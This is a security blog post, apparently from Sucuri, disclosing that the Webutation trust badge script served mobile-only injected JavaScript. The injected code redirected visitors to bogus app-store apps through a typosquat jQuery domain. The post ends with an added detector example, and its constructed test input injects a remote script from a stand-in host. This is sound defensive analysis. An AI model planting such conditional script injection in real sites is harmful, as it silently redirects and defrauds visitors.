Sucuri Blog

Website Security News

Webutation Distributing Malware Through Safety Badge

July 16, 2015, Krasimir Konov

If you are using the Webutation badge on your site, remove it now. It appears they got hacked and are distributing malware to mobile devices through redirects hidden within the badge’s code.

We were analyzing a website that was compromised and redirecting visitors to bogus apps on the Apple App Store and the Google Play Store. The website looked clean, but the redirect kept happening for mobile users. Upon further inspection, we found out that the Webutation safety badge was responsible for the redirect.

The file load_badge.js – which is used to generate the badge – has some additional JavaScript from jquaryr[.]com that is only displayed for mobile user agents. That code from jquaryr (obviously an intentional typo of jQuery) forces a page reload, which then pushes the user to the bogus apps. This is dangerous because visitors rely on security badges to confirm the credibility and security of the website they are visiting. This is the first time we have seen one hacked in this way to distribute malware and malicious redirects.

[Image: webutation-badge]

Security Badge Causing Mobile Redirects

This is what the badge code looks like for mobile users:

[Image: mobile-webutation]

You can see that the last two lines, which were added to the badge code, cause the redirect:

[Image: webutation-redirect]

That opens the popOL.php URL, which loads an affiliate URL from mobitrk.com, which then pushes the visitor to the bogus apps:

[Image: webutation-3]

Difficult to Diagnose

The malware also uses a cookie to prevent multiple redirects on the same browser, making it hard for webmasters to detect the problem.

Again, if you are using Webutation, remove the badge from your site now, at least until they get the issue fixed. We will continue to monitor the issue and provide updates when we know more.
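The check below is an added example, not code from the original post or from Sucuri's tooling: it compares one third-party script as returned to a desktop and to a mobile user agent (each fetched with no cookies, because a cookie suppresses the redirect) and reports hosts that appear only in the mobile variant, noting lookalikes of well-known library names. The `.example` hosts, script bodies, function names and the `KNOWN_LIBS` list are constructed assumptions; only the `jquaryr` label comes from the post.

```javascript
// Added example: every host and script body here is a constructed sample.
const KNOWN_LIBS = ["jquery", "bootstrap", "googleapis", "cloudflare"];

// Levenshtein edit distance between two short strings.
function editDistance(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1,
        prev[j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
    }
    prev = cur;
  }
  return prev[b.length];
}

// Hostnames referenced by absolute or protocol-relative URLs in a script.
function extractHosts(scriptBody) {
  const re = /(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  return new Set([...scriptBody.matchAll(re)].map((m) => m[1].toLowerCase()));
}

// Known library name that a host label imitates (1-2 edits away), or null.
function lookalikeOf(host) {
  for (const label of host.split(".")) {
    for (const lib of KNOWN_LIBS) {
      const d = editDistance(label, lib);
      if (d > 0 && d <= 2) return lib;
    }
  }
  return null;
}

// Hosts that only the mobile-UA response of the same script URL references.
function mobileOnlyHosts(desktopBody, mobileBody) {
  const desktop = extractHosts(desktopBody);
  return [...extractHosts(mobileBody)]
    .filter((host) => !desktop.has(host))
    .map((host) => ({ host, lookalikeOf: lookalikeOf(host) }));
}

// Constructed responses for one badge URL, as seen by two user agents.
const desktopBody = 'document.write(\'<img src="//badge.example/img.png">\');';
const mobileBody = desktopBody +
  'var s=document.createElement("script");s.src="http://jquaryr.example/m.js";' +
  'document.head.appendChild(s);';

console.log(mobileOnlyHosts(desktopBody, mobileBody));
```

Any host in the result deserves a manual look; a non-null `lookalikeOf` is a stronger signal but not proof on its own.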

Categories: Vulnerability Disclosure, Website Security
Tags: Conditional Malware, Hacked Websites, Redirects

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Comments

  1. Zion Oyemade

    July 17, 2015

    Just a thought Krasimir,
    What if the bug is intentional by Webutation itself? They are yet to report or make a notification on the bug themselves to users.

    • Krasimir

      July 17, 2015

      Thanks for the comment. This could be intentional but we can’t confirm it at this time. We assume their website must have been compromised.
